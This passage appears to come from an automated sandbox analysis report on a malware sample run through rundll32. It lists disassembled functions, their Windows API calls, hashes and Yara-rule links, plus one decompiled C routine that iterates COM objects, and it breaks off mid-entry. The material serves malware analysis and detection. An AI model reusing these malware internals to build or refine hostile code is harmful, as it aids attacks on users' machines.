                          • Opcode Fuzzy Hash: 401e07799e19abe30d6d21427eaae3e9abc6fbea318d654b4f907084fba2a12c
                          • Instruction Fuzzy Hash: CE015E36240218BBDB111F25EC4ADAA7F6EEB84261F048062FD199B251DA36AD15DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7DCF6 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD35
                          • ResetEvent.KERNEL32(?,?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD3A
                          • GetLastError.KERNEL32(05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD55
                          • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD84
                            • Part of subcall function 05B6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000), ref: 05B6D435
                            • Part of subcall function 05B6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?), ref: 05B6D493
                            • Part of subcall function 05B6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4A3
                          • SetEvent.KERNEL32(?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD76
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 1449191863-0
                          • Opcode ID: 8a24b21167802676405f41e838f00a192a704ab6faf35f027b5f44f013576e43
                          • Instruction ID: 6090759745bc9a701bfc79bd8a87a21deb6a16a5c3f6a3e3180795e9add44db0
                          • Opcode Fuzzy Hash: 8a24b21167802676405f41e838f00a192a704ab6faf35f027b5f44f013576e43
                          • Instruction Fuzzy Hash: AA115EB1100509AFDB31AE64DC49EAB3FAAFF083A4F104660F926910A0CB31F951DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B80A9D Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 05B80AB4
                            • Part of subcall function 05B7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7EC20
                            • Part of subcall function 05B7EC09: SetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7EC30
                          • lstrlen.KERNEL32(?,?,?,?,?,05B6859B,?,?), ref: 05B80AD7
                          • lstrlen.KERNEL32(?,?,?,?,05B6859B,?,?), ref: 05B80AE1
                          • memcpy.NTDLL(?,?,00004000,?,?,05B6859B,?,?), ref: 05B80AF2
                          • HeapFree.KERNEL32(00000000,?,?,?,?,05B6859B,?,?), ref: 05B80B14
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                          • String ID:
                          • API String ID: 442095154-0
                          • Opcode ID: d1b2c26887af6ff9c3204bbe9d45876af9e2d5f26d8d43949a1b0cc019b110ad
                          • Instruction ID: 497b52e6d5b68389f88a20ff887838368fd96f7cbed62e21903f8b2226e0d44d
                          • Opcode Fuzzy Hash: d1b2c26887af6ff9c3204bbe9d45876af9e2d5f26d8d43949a1b0cc019b110ad
                          • Instruction Fuzzy Hash: 48117075600208FFCB11AB55EC49E6A7FBAEB85354F2450A5F805A7250DA31FD04DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B77A3E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,05B6E448,?), ref: 05B77A6A
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B77A7C
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77A99
                          • lstrlenW.KERNEL32(00000000,?,?,05B6E448,?), ref: 05B77AA5
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B6E448,?), ref: 05B77AB9
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                          • String ID:
                          • API String ID: 3403466626-0
                          • Opcode ID: 2ba0630c1a54cc054586ff56b5e47d0c1f45a9b392f0d8b022fac6f2d16570c2
                          • Instruction ID: 0cb3a4aba293f937ac90f1c26534f0422daa534cad6287db6e84a1b528e186ca
                          • Opcode Fuzzy Hash: 2ba0630c1a54cc054586ff56b5e47d0c1f45a9b392f0d8b022fac6f2d16570c2
                          • Instruction Fuzzy Hash: 82018072111204BFD7119B98DC45FBA7BAEFF09314F101055F6059B150CF74B904DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6F49F Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4BF
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4CD
                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 05B6F4DA
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4F1
                          • GetModuleHandleA.KERNEL32 ref: 05B6F4FD
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HandleModule$LibraryLoad
                          • String ID:
                          • API String ID: 1178273743-0
                          • Opcode ID: 061190c3deeffd94cd258aebc02aeacadbfcff2110c3bf8353ce8a3487694c84
                          • Instruction ID: 6eb3ea12febd02d98ffc0e1da1b8c6b92993e31a4158ee9e132c720b266cfeb8
                          • Opcode Fuzzy Hash: 061190c3deeffd94cd258aebc02aeacadbfcff2110c3bf8353ce8a3487694c84
                          • Instruction Fuzzy Hash: C001463121420AABDF056F69EC81D7A3FAAFF442617041066F91582164EF75FC21DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7BDC6 Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,05B6396C), ref: 05B7BDCC
                          • StrTrimA.SHLWAPI(00000001,?,?,05B6396C), ref: 05B7BDEF
                          • StrTrimA.SHLWAPI(00000000,?,?,05B6396C), ref: 05B7BDFE
                          • _strupr.NTDLL ref: 05B7BE01
                          • lstrlen.KERNEL32(00000000,05B6396C), ref: 05B7BE09
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Trim$_struprlstrlen
                          • String ID:
                          • API String ID: 2280331511-0
                          • Opcode ID: f091f8226de7edc5b7b78c57745274c04909311931d8fe7d4e0810d05d707e9e
                          • Instruction ID: 7360fefaf5f12d0f7047998ed751107d021b7ff60fca99aa99549169e3a544e0
                          • Opcode Fuzzy Hash: f091f8226de7edc5b7b78c57745274c04909311931d8fe7d4e0810d05d707e9e
                          • Instruction Fuzzy Hash: 33F062713100156FD715AB64EC9AE7B7BEEEB46665B10104AF509C7280EF24BC02C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81659 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B81664
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B81675
                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,05B74B8B,?,?,05B8A428,05B625BA,00000003), ref: 05B8168C
                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,05B74B8B,?,?,05B8A428,05B625BA,00000003), ref: 05B816A6
                          • GetLastError.KERNEL32(?,?,05B74B8B,?,?,05B8A428,05B625BA,00000003), ref: 05B816B3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 653387826-0
                          • Opcode ID: 175b02b3b17b67ab37735be4f1e3cf54cd4a859ccf5fb8c66b56ec36a70e481d
                          • Instruction ID: 507e209e8fd537bf7cb1ee755122cf0cd96041430b11a3e570c596c2d752aef8
                          • Opcode Fuzzy Hash: 175b02b3b17b67ab37735be4f1e3cf54cd4a859ccf5fb8c66b56ec36a70e481d
                          • Instruction Fuzzy Hash: B5018F75200204AFD720AF64CC05E7ABBBAFF84620B248159FA5693390DB70F902DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B70818 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05B72397,?), ref: 05B70820
                          • GetVersion.KERNEL32 ref: 05B7082F
                          • GetCurrentProcessId.KERNEL32 ref: 05B7084B
                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05B70868
                          • GetLastError.KERNEL32 ref: 05B70887
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                          • String ID:
                          • API String ID: 2270775618-0
                          • Opcode ID: b4ca883db49286165b31e7ba9ef54517119cb72635d2741ecc5390a05b2ebb5c
                          • Instruction ID: 7acaed26d3670ecd62eb638d6ce1d057be5d883e940aebbabeb68904803b3946
                          • Opcode Fuzzy Hash: b4ca883db49286165b31e7ba9ef54517119cb72635d2741ecc5390a05b2ebb5c
                          • Instruction Fuzzy Hash: A1F04670674309AAE724BB60A84BB353F63BB05B21FA02117F626DB1C0DB70B080CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B689EE Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 05B689FB
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05B68A0B
                          • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05B68A14
                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05B72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05B68A32
                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05B72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05B68A3F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                          • String ID:
                          • API String ID: 3667519916-0
                          • Opcode ID: 6ee78ab78b61ddba6833d54943745b295d7477f74e0e628f603f6eadeb86ae70
                          • Instruction ID: 1d746712d7f0362eb187dc19b419fd4d3dd6b6992b02db8b0e756f2445fc54d8
                          • Opcode Fuzzy Hash: 6ee78ab78b61ddba6833d54943745b295d7477f74e0e628f603f6eadeb86ae70
                          • Instruction Fuzzy Hash: 59F03A36204704AFDB316A75DC49B2ABAE9FF44651F204669F952A25D0CB28F805CA60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7C484 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 05B7C4A8
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • wsprintfA.USER32 ref: 05B7C4D9
                            • Part of subcall function 05B6AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05B6A1A1), ref: 05B6AAC5
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6AAED
                            • Part of subcall function 05B6AAAF: lstrlen.KERNEL32(?), ref: 05B6AAFC
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6AB3C
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6AB71
                            • Part of subcall function 05B6AAAF: memcpy.NTDLL(00000000,?,?), ref: 05B6AB7E
                            • Part of subcall function 05B6AAAF: memcpy.NTDLL(00000008,05B853E8,00000002,00000000,?,?), ref: 05B6AB93
                            • Part of subcall function 05B6AAAF: wsprintfA.USER32 ref: 05B6ABB6
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05B7C54E
                            • Part of subcall function 05B82968: RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B8297E
                            • Part of subcall function 05B82968: RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B82999
                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 05B7C538
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 05B7C544
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                          • String ID:
                          • API String ID: 3553201432-0
                          • Opcode ID: 49920cf3b2c48a7c721d6a564c45168f8a1e0f80fcaa15eaf2ff470d47e8e0e4
                          • Instruction ID: aa032d5620fc40e3df9e5574808ef33908c8c30ed96ba66e91b5bc32454e4cd1
                          • Opcode Fuzzy Hash: 49920cf3b2c48a7c721d6a564c45168f8a1e0f80fcaa15eaf2ff470d47e8e0e4
                          • Instruction Fuzzy Hash: 7021D876900149AFCF11DFA9DD89CAF7FBAFB48310B00545AF915A7110E771EA24DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6EF5F Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                          Download Yara Rule
                          APIs
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6EFBC
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6EFCD
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6EFE5
                          • CloseHandle.KERNEL32(?), ref: 05B6EFFF
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6F014
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap$CloseHandle
                          • String ID:
                          • API String ID: 1910495013-0
                          • Opcode ID: 7334238cf755a923433aab28d3d9b3d8c9cc884406c2561b94ce9ba6ab15ceab
                          • Instruction ID: ba30ef7fe418666be7a866aa14a649e355179e982699cb590236c724632a3871
                          • Opcode Fuzzy Hash: 7334238cf755a923433aab28d3d9b3d8c9cc884406c2561b94ce9ba6ab15ceab
                          • Instruction Fuzzy Hash: 5A212975205922AFD7219F65DC88C2AFBAAFF49B103540494F40AD3654CB35FCA1DBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B796EE Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B6EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 05B6EC1B
                            • Part of subcall function 05B6EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 05B6EC69
                            • Part of subcall function 05B6EC00: GetProcAddress.KERNEL32(00000000,?), ref: 05B6EC82
                            • Part of subcall function 05B6EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 05B6ECD3
                          • GetLastError.KERNEL32(?,?,00000001), ref: 05B7987C
                          • FreeLibrary.KERNEL32(?,?,00000001), ref: 05B798E4
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                          • String ID:
                          • API String ID: 1730969706-0
                          • Opcode ID: bbb7b56c265ebfa79fd91d13c5eba9e61768153dc116e37477f6843c1dbab7d2
                          • Instruction ID: f8b384f39b8bdc4309481c3a132aa5abcc09421e5c6785e21f26b226fe66a64e
                          • Opcode Fuzzy Hash: bbb7b56c265ebfa79fd91d13c5eba9e61768153dc116e37477f6843c1dbab7d2
                          • Instruction Fuzzy Hash: DE71D675E0020DEFCF10DFE5C8889AEBBB9FF48354B1485A9E526AB251D731A941CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01002732 Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 46%
                          			E01002732(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x100a348; // 0x428d5a8
					_t5 = _t103 + 0x100b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x1009290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x100a348; // 0x428d5a8
												_t28 = _t109 + 0x100b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x100a348; // 0x428d5a8
														_t33 = _t79 + 0x100b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                          0x01002737
                          0x01002740
                          0x01002741
                          0x01002745
                          0x0100274b
                          0x01002751
                          0x0100275a
                          0x01002760
                          0x0100276a
                          0x0100276c
                          0x01002772
                          0x01002777
                          0x01002782
                          0x01002788
                          0x0100278d
                          0x010028af
                          0x01002793
                          0x01002793
                          0x010027a0
                          0x010027a6
                          0x010027ac
                          0x010027b0
                          0x010027b6
                          0x010027c3
                          0x010027c7
                          0x010027cd
                          0x010027d0
                          0x010027d8
                          0x010027d9
                          0x010027dd
                          0x010027e1
                          0x010027e4
                          0x010027e7
                          0x010027ed
                          0x010027f6
                          0x010027fc
                          0x010027fd
                          0x01002800
                          0x01002801
                          0x01002802
                          0x0100280a
                          0x0100280b
                          0x0100280c
                          0x0100280e
                          0x01002812
                          0x01002816
                          0x00000000
                          0x00000000
                          0x0100281c
                          0x01002825
                          0x0100282b
                          0x01002835
                          0x01002839
                          0x0100283b
                          0x01002848
                          0x0100284c
                          0x01002854
                          0x01002859
                          0x0100286b
                          0x0100286d
                          0x01002873
                          0x01002873
                          0x0100287c
                          0x0100287c
                          0x0100287e
                          0x01002884
                          0x01002884
                          0x01002887
                          0x0100288d
                          0x01002890
                          0x01002899
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01002899
                          0x010027ed
                          0x010027e7
                          0x010027d0
                          0x0100289f
                          0x0100289f
                          0x010028a5
                          0x010028a5
                          0x010028ab
                          0x010028ab
                          0x010028b4
                          0x010028ba
                          0x010028ba
                          0x01002777
                          0x010028c3

                          APIs
                          • SysAllocString.OLEAUT32(01009290), ref: 01002782
                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 01002863
                          • SysFreeString.OLEAUT32(00000000), ref: 0100287C
                          • SysFreeString.OLEAUT32(?), ref: 010028AB
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$Free$Alloclstrcmp
                          • String ID:
                          • API String ID: 1885612795-0
                          • Opcode ID: d03f0f81ea414d61c1dbfb73d3a3acde04e0dde40935306c2a5ea785d3bce501
                          • Instruction ID: 669f05aa535099a8c725edfdb7d4f57254387ffc12ccae15616cd997b05c2fb1
                          • Opcode Fuzzy Hash: d03f0f81ea414d61c1dbfb73d3a3acde04e0dde40935306c2a5ea785d3bce501
                          • Instruction Fuzzy Hash: 6B514D75D0060AEFDB12DFA8C4889EEB7B5EF88704F148598F915EB254D731AE41CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01005B9D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 01005BD8
                          • SysFreeString.OLEAUT32(00000000), ref: 01005CBD
                            • Part of subcall function 01002732: SysAllocString.OLEAUT32(01009290), ref: 01002782
                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 01005D10
                          • SysFreeString.OLEAUT32(00000000), ref: 01005D1F
                            • Part of subcall function 01003A62: Sleep.KERNEL32(000001F4), ref: 01003AAA
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                          • String ID:
                          • API String ID: 3193056040-0
                          • Opcode ID: 820053f1dea4751c9db843175ea27d60f25049e190378020738d0edd92380371
                          • Instruction ID: 45e5d09de83de8fc158be64d670bfb62901204938deef16c2c39fdccc66541e0
                          • Opcode Fuzzy Hash: 820053f1dea4751c9db843175ea27d60f25049e190378020738d0edd92380371
                          • Instruction Fuzzy Hash: 92516035500609AFEB12DFA8D844ADEB7B6FF88700F148469E985DB254DB31ED06CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B82E7D Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?), ref: 05B82E89
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • ResetEvent.KERNEL32(?,?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6), ref: 05B82F00
                          • GetLastError.KERNEL32(?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?), ref: 05B82F2D
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • GetLastError.KERNEL32(?,?,?,05B7DD27,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?), ref: 05B82FEF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                          • String ID:
                          • API String ID: 943265810-0
                          • Opcode ID: 96ea7dd3ede0d9ddd0f2dc6b38f0f635f2555e9957c88128a8cc75788aa954b7
                          • Instruction ID: 9410b3361353d41eada51cd2af8f1163f79e2f1faddc00e2364614402e7a2ee8
                          • Opcode Fuzzy Hash: 96ea7dd3ede0d9ddd0f2dc6b38f0f635f2555e9957c88128a8cc75788aa954b7
                          • Instruction Fuzzy Hash: 66415F75510604BFEB21AFA0CC89EBBBBADFB04701B145969F502D6190EB70F944DA60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74DA9 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
